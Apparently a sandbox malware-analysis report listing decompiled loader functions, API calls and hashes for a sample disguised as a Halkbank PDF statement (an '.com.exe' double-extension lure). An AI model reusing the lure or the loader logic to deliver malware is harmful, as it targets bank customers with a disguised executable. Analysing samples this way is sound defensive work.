                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                      • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                      • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                      • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                      0x00406a3d
                                                      0x00406a40
                                                      0x00406a47
                                                      0x00406a4f
                                                      0x00406a5b
                                                      0x00000000
                                                      0x00406a62
                                                      0x00406a52
                                                      0x00406a59
                                                      0x00000000
                                                      0x00406a6a
                                                      0x00000000

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                        • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                        • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                        • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                      • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                      • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                      • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                      0x0040615c
                                                      0x00406169
                                                      0x0040617e
                                                      0x00406184

                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                      • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                      • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                      • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                      0x00406138
                                                      0x0040613e
                                                      0x00406143
                                                      0x0040614c
                                                      0x0040614c
                                                      0x00406155

                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                      • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                      • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                      0x00405c1c
                                                      0x00405c24
                                                      0x00000000
                                                      0x00405c2a
                                                      0x00000000

                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                      • GetLastError.KERNEL32 ref: 00405C2A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                      • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                      • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                      • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                      0x0040620e
                                                      0x0040621e
                                                      0x00406226
                                                      0x00000000
                                                      0x0040622d
                                                      0x00000000
                                                      0x0040622f

                                                      APIs
                                                      • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040E158,0040CEF0,00403579,0040CEF0,0040E158,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                      • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                      • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                      0x004061df
                                                      0x004061ef
                                                      0x004061f7
                                                      0x00000000
                                                      0x004061fe
                                                      0x00000000
                                                      0x00406200

                                                      APIs
                                                      • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                      • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                      • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                      0x00403606
                                                      0x0040360c

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                      0x00401faa
                                                      0x00401faf
                                                      0x00401fb5
                                                      0x00401fba
                                                      0x00401fbe
                                                      0x0040292e
                                                      0x00401fc4
                                                      0x00401fc7
                                                      0x00401fca
                                                      0x00401fd2
                                                      0x00401fe1
                                                      0x00401fe3
                                                      0x00401fe3
                                                      0x00401fd4
                                                      0x00401fd8
                                                      0x00401fd8
                                                      0x00401fd2
                                                      0x00401fea
                                                      0x00401feb
                                                      0x00401feb
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                        • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                        • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                        • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                        • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                      • String ID:
                                                      • API String ID: 2972824698-0
                                                      • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                      • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                      • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                      • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                      0x00405811
                                                      0x00405817
